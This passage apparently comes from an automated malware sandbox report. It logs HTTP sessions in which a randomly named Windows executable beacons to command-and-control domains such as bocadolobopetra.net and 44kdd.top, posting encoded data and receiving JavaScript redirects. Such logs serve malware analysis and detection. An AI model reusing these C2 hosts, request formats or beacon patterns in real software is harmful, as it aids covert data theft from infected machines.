                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 4b 45 39 64 4c 4b 55 52 55 61 4f 4e 48 4c 76 6a 58 56 57 73 31 59 68 39 54 56 67 61 76 57 35 70 7a 33 76 4e 50 2b 67 39 75 4f 4f 72 55 56 67 58 4e 2f 69 55 65 61 6d 44 55 54 41 39 6c 37 47 75 53 33 42 79 4c 58 41 4c 39 53 56 67 54 68 79 4c 44 31 4a 77 32 6c 77 35 32 5a 35 53 2f 67 49 4d 38 4f 39 61 66 61 51 61 7a 42 74 53 6c 47 61 64 6f 4d 79 6c 64 68 4e 32 7a 59 39 65 7a 77 45 4a 50 79 46 73 43 5a 46 75 57 34 54 50 70 52 66 2b 31 63 63 7a 73 56 55 56 69 59 41 4b 4d 36 79 30 52 76 63 31 48 35 61 35 50 4e 73 73 73 39 4b 2f 45 55 50 4c 59 6f 4a 62 77 62 6f 66 35 38 44 7a 31 39 57 37 69 67 69 4c 37 38 4f 68 43 30 51 54 66 43 36 69 54 36 71 5a 37 63 6f 6d 4a 63 62 6b 53 77 59 30 74 4b 6c 6b 42 31 6b 54 47 30 6a 6d 52 62 72 75 46 63 38 39 50 79 2f 4c 37 73 59 67 38 6b 6a 59 49 4d 6b 52 64 57 55 67 4d 46 4a 4e 43 6d 38 46 37 54 31 41 58 41 66 44 71 42 4c 78 58 52 43 54 4f 75 7a 39 42 50 54 6b 41 6e 74 4e 6e 56 51 46 69 37 6d 64 2b 6a 47 44 74 39 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=6njfiHd/8RikZKE9dLKURUaONHLvjXVWs1Yh9TVgavW5pz3vNP+g9uOOrUVgXN/iUeamDUTA9l7GuS3ByLXAL9SVgThyLD1Jw2lw52Z5S/gIM8O9afaQazBtSlGadoMyldhN2zY9ezwEJPyFsCZFuW4TPpRf+1cczsVUViYAKM6y0Rvc1H5a5PNsss9K/EUPLYoJbwbof58Dz19W7igiL78OhC0QTfC6iT6qZ7comJcbkSwY0tKlkB1kTG0jmRbruFc89Py/L7sYg8kjYIMkRdWUgMFJNCm8F7T1AXAfDqBLxXRCTOuz9BPTkAntNnVQFi7md+jGDt9ShjnV0CjcyLeHR6KgVf1BOOmIe2qkEZv83QZspYsPWPj0Rf8oLkNHzjNtWAoDROCM1O+vCzUix1iwmjEB8xaPGBbufnyZmq2vEVOz9Wj8hmHtDfxJ262/KzdsEJ11gHMh34Jb2bzPNNXJrd5WjlkfmegKzrNvmQIic9mU6GG+5hEzqvtRvbrVI+w/EhQDz2VR3isn7YuR6gHtKzp47LfzRk5K9Sjk87d3kU7YUktIEtBq921867WjTlBaLDnDCEV2nh3/aDhazKYefYxnzsnwu4aZv4x5M2uWAehlsTD4/7C0v+Cbz/L9EUKzhD25r7cflVhWzRq49KlkqgUH9BTzvOefTNRzW+xULY7Nu5JCJy3FDzclx3Z0P8DYIkgP3YuQIqKDnKzf76G/74/5psCI/FXaK3FKjVX/xP/rTGlWjeC8X0acDTlsCM03fQGObg8YHTne92Eck+A+sOV0DakUHNzddZp8HPSqFVxnKusndT1nSar2eFIknGKTdJZvgXWZDbEuPuW7r7VWjcaMk64ccqFkLvr9Fe2AfsJTPkGQBoJLc7JogDMznthM45Ll7yfcZHzIYPU1jSuwIL6YkHhVbOTIi2pC01MVdlsX0Bhcy8qKC3K0O2P3Acis1wKb8u5OFBSVu54ca5KQK8TNJbAgypZ+lwZbL6wKR [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.4629103.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:52.964891911 CET526OUTGET /mgme/?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:18:54.499588013 CET403INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:54 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 6e 30 50 4c 4e 3d 33 6c 4c 2f 68 79 70 78 31 68 6d 79 57 4b 63 5a 4c 50 50 6a 49 33 79 30 44 57 7a 64 68 31 4d 71 6f 6d 39 55 2f 31 78 68 54 50 4c 71 75 46 58 4f 45 74 43 4f 6a 65 47 59 68 48 30 50 48 2b 61 75 56 4e 69 59 4b 6e 7a 4d 39 57 2f 75 6b 33 6d 69 37 59 62 6c 4a 75 4f 53 67 33 45 42 49 79 73 2b 2f 68 68 6b 31 31 30 78 61 4d 52 7a 43 2b 2b 59 65 63 4f 34 62 53 41 3d 26 78 5a 61 3d 6a 70 67 44 4f 56 48 38 50 58 57 38 6f 42 41 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0"}</script></head></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.4629113.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:18:59.577398062 CET805OUTPOST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 55 35 67 52 4d 41 6c 61 6f 77 4f 34 67 63 33 69 63 75 51 52 6d 52 63 6f 56 4e 49 6b 63 36 37 4d 61 42 63 32 58 57 53 57 61 44 50 6a 58 2f 79 64 76 6c 72 4a 4c 75 67 53 67 31 53 49 4a 53 59 33 66 58 30 59 30 73 32 79 33 39 7a 76 76 4c 32 34 33 53 31 6d 5a 62 54 43 64 38 5a 6a 43 62 69 45 32 52 67 4b 39 35 4b 33 77 57 54 39 65 34 2f 2f 4b 76 45 4b 45 36 42 41 37 46 79 59 57 71 34 30 32 4e 71 74 5a 4f 2b 38 45 4d 46 30 41 69 57 2b 6d 72 7a 54 6a 31 67 72 77 5a 79 75 55 39 54 73 31 4e 32 34 71 64 57 53 2f 53 38 37 55 2b 74 6e 73 4a 75 43 55 51 3d 3d
                                                                                                                      Data Ascii: sn0PLN=osnv7c/A27cFU5gRMAlaowO4gc3icuQRmRcoVNIkc67MaBc2XWSWaDPjX/ydvlrJLugSg1SIJSY3fX0Y0s2y39zvvL243S1mZbTCd8ZjCbiE2RgK95K3wWT9e4//KvEKE6BA7FyYWq402NqtZO+8EMF0AiW+mrzTj1grwZyuU9Ts1N24qdWS/S87U+tnsJuCUQ==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.4629123.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:02.134051085 CET825OUTPOST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 53 61 49 52 4f 68 6c 61 6a 77 4f 35 38 4d 33 69 47 65 51 56 6d 52 51 6f 56 49 34 4f 63 49 76 4d 62 6b 34 32 46 6a 75 57 64 44 50 6a 63 66 79 69 79 31 71 46 4c 75 6c 6e 67 30 65 49 4a 53 63 33 66 53 51 59 31 66 75 78 32 74 7a 74 36 62 32 2b 7a 53 31 6d 5a 62 54 43 64 38 4d 45 43 62 36 45 33 6c 6b 4b 2b 62 69 77 78 57 54 36 55 59 2f 2f 63 66 45 30 45 36 42 6d 37 48 48 31 57 73 6b 30 32 49 57 74 59 63 58 4f 50 4d 46 79 45 69 58 6f 31 72 2b 32 72 46 35 64 39 6f 69 33 5a 2b 54 78 39 72 37 69 37 73 33 46 74 53 59 49 4a 35 6b 54 68 4b 54 4c 50 54 6a 39 61 56 50 6c 51 43 6c 5a 65 44 47 79 70 6d 75 34 59 67 38 3d
                                                                                                                      Data Ascii: sn0PLN=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcIvMbk42FjuWdDPjcfyiy1qFLulng0eIJSc3fSQY1fux2tzt6b2+zS1mZbTCd8MECb6E3lkK+biwxWT6UY//cfE0E6Bm7HH1Wsk02IWtYcXOPMFyEiXo1r+2rF5d9oi3Z+Tx9r7i7s3FtSYIJ5kThKTLPTj9aVPlQClZeDGypmu4Yg8=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.4629133.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:04.688930988 CET10907OUTPOST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 53 61 49 52 4f 68 6c 61 6a 77 4f 35 38 4d 33 69 47 65 51 56 6d 52 51 6f 56 49 34 4f 63 49 33 4d 62 57 77 32 55 30 36 57 63 44 50 6a 56 2f 79 6e 79 31 71 49 4c 71 42 72 67 30 43 2b 4a 52 30 33 64 78 6f 59 79 75 75 78 34 74 7a 74 69 72 32 37 33 53 30 38 5a 66 2f 65 64 38 63 45 43 62 36 45 33 6b 55 4b 70 5a 4b 77 38 32 54 39 65 34 2f 6a 4b 76 45 50 45 36 59 54 37 48 44 44 57 66 38 30 32 6f 6d 74 62 76 2f 4f 4e 73 46 77 4a 43 58 67 31 72 79 6c 72 46 6c 72 39 6f 57 4e 5a 35 6a 78 34 63 4b 64 6e 65 6a 6d 36 52 6f 61 4c 4b 55 46 6f 74 6a 32 48 67 6d 43 66 6e 57 38 43 7a 35 56 61 6b 7a 68 30 6a 75 6e 4e 77 45 6c 48 77 73 41 4a 56 51 77 69 6b 50 43 38 63 54 79 5a 67 42 50 72 50 5a 61 4f 69 4b 51 35 35 44 52 70 63 5a 6d 6e 7a 49 66 48 5a 44 6b 30 55 37 46 31 79 49 39 4f 75 4f 39 48 2b 79 67 48 2f 54 37 6d 30 63 55 69 68 2f 63 70 70 46 42 5a 6a 66 79 6b 69 70 70 50 71 6c 47 37 50 31 69 4a 67 32 4a 42 6a 67 59 31 62 68 58 4e 6b 41 35 76 65 6f 31 68 39 32 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcI3MbWw2U06WcDPjV/yny1qILqBrg0C+JR03dxoYyuux4tztir273S08Zf/ed8cECb6E3kUKpZKw82T9e4/jKvEPE6YT7HDDWf802omtbv/ONsFwJCXg1rylrFlr9oWNZ5jx4cKdnejm6RoaLKUFotj2HgmCfnW8Cz5Vakzh0junNwElHwsAJVQwikPC8cTyZgBPrPZaOiKQ55DRpcZmnzIfHZDk0U7F1yI9OuO9H+ygH/T7m0cUih/cppFBZjfykippPqlG7P1iJg2JBjgY1bhXNkA5veo1h92aduzAEwkUVBYRsPvPIc8TQMHASZ4T9z9vxVxhq/4+Wo0ZCQw3ioY0+Rqgt5P6yN4+pfZUn2GyNey4vyQRHCmZmy+J9t8QJMUQr79SYR2JhLQVMsRZGV3FUV3eblNf1SucdgGjftO4aH+h6espi7H47vXuQiN8NqBq1AJBZP/6S8ClEw3fmft2gWQ3j5xsh9kYYdzQlz5u2a+tcbI7/yX5is5vd9Y0tRW9dk0bsQr4kJIEhUJH5EhyL/WoM6w5y3pR5uifVeUHut0Jc7Mo0WNZ/Ld/Yfl7NysZTle0Czld5TrmfzbAsx9uJYJOoPdLeRvleuWwwxo8mUbzIAaTUDF6aGxbxs/dV8bczMoF+22/fqNC7SCFBOY/1qI3AZhoTyHziyVbuaFbP3PGupCVcmWvtF3duRbV8nXd3uUfsLwxGLIRPea8HW3ij/C5LJrXw0EprVs5F+pTvTk9DiGyiTC9fG65QwzzcBdfElJ7lItrFUKKy/pnH10UwY4tZ0ya8QxgAmBRkY1YlbAXDZUbI9irLC9WSGDjYalMA7NMUklGOhiRE7EqMMrmk//GEueajlBWdZAFfYIQUe5ot3HboLe32qTbq7KWYAX/QA5Aa4O5MpHwespCtiiTJJCThrBZDChd6kn1L6p5/nae3h28GN2T/qDC2XGuDlwCT [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.4629143.33.130.190803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:07.227822065 CET536OUTGET /4q66/?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:19:10.800127029 CET403INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 6e 30 50 4c 4e 3d 6c 75 50 50 34 6f 79 41 2b 49 78 58 61 34 64 50 61 51 34 34 75 54 58 2b 79 6f 6a 35 41 76 30 33 33 51 4d 50 56 4e 49 46 59 4b 43 32 55 6e 74 4a 64 46 48 4f 58 77 57 41 58 2f 37 7a 68 58 6a 49 58 4c 59 71 76 57 65 63 49 53 77 74 55 48 68 7a 31 2b 61 4a 77 62 4b 34 36 71 2f 4b 31 44 55 38 4f 72 50 72 56 2b 67 46 48 59 65 41 33 47 77 38 72 35 2b 66 6c 48 73 3d 26 78 5a 61 3d 6a 70 67 44 4f 56 48 38 50 58 57 38 6f 42 41 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0"}</script></head></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.46291538.47.232.160803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:16.003429890 CET775OUTPOST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 57 77 2f 54 45 63 64 6a 6f 68 37 4a 54 4b 37 6d 5a 49 54 38 4f 47 67 41 63 61 79 61 33 72 63 31 78 6e 46 70 73 6f 43 36 6a 55 42 37 75 4d 4f 78 38 68 58 68 6c 56 46 39 6e 74 4a 37 66 78 6b 58 34 58 6a 51 6c 67 6f 62 77 6d 78 43 4c 76 68 78 50 48 64 78 6c 58 74 76 36 66 39 48 62 65 64 41 4b 66 61 44 43 62 50 64 6b 68 38 54 72 71 4c 45 63 31 5a 42 52 33 50 66 74 6a 6c 52 56 54 58 42 62 34 4c 62 54 46 47 78 63 59 38 79 74 63 4e 7a 71 50 52 68 57 41 6a 39 72 75 41 4f 43 46 44 78 54 43 76 67 58 43 76 45 59 70 2b 67 52 73 43 32 47 6e 34 41 4e 77 3d 3d
                                                                                                                      Data Ascii: sn0PLN=Admh/P5tA4M5Ww/TEcdjoh7JTK7mZIT8OGgAcaya3rc1xnFpsoC6jUB7uMOx8hXhlVF9ntJ7fxkX4XjQlgobwmxCLvhxPHdxlXtv6f9HbedAKfaDCbPdkh8TrqLEc1ZBR3PftjlRVTXBb4LbTFGxcY8ytcNzqPRhWAj9ruAOCFDxTCvgXCvEYp+gRsC2Gn4ANw==
                                                                                                                      Nov 1, 2024 09:19:16.992831945 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.46291638.47.232.160803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:18.616914034 CET795OUTPOST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 41 64 6d 68 2f 50 35 74 41 34 4d 35 58 55 44 54 47 39 64 6a 39 78 37 47 57 4b 37 6d 4d 34 54 34 4f 47 73 41 63 62 32 4b 33 64 4d 31 2f 6e 31 70 74 70 43 36 75 30 42 37 6d 73 50 37 34 68 58 51 6c 56 35 44 6e 6f 4a 37 66 77 45 58 34 53 66 51 35 43 41 63 77 32 78 41 65 66 68 33 42 6e 64 78 6c 58 74 76 36 66 70 70 62 65 46 41 4b 73 43 44 44 36 50 65 37 52 38 55 73 71 4c 45 4b 46 5a 4e 52 33 4f 36 74 6d 46 2f 56 57 54 42 62 39 33 62 54 52 61 75 56 59 38 6f 77 4d 4d 51 6a 63 49 6d 5a 44 47 77 76 6f 51 6f 46 6d 66 73 53 45 69 36 47 7a 4f 54 4b 70 61 54 4d 72 4c 43 4c 6b 46 4a 57 38 58 63 68 49 42 58 67 54 47 63 58 41 72 64 7a 78 76 77 71 70 63 3d
                                                                                                                      Data Ascii: sn0PLN=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dM1/n1ptpC6u0B7msP74hXQlV5DnoJ7fwEX4SfQ5CAcw2xAefh3BndxlXtv6fppbeFAKsCDD6Pe7R8UsqLEKFZNR3O6tmF/VWTBb93bTRauVY8owMMQjcImZDGwvoQoFmfsSEi6GzOTKpaTMrLCLkFJW8XchIBXgTGcXArdzxvwqpc=
                                                                                                                      Nov 1, 2024 09:19:19.591402054 CET312INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:19 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.46291738.47.232.160803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:19:21.343086004 CET10877OUTPOST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
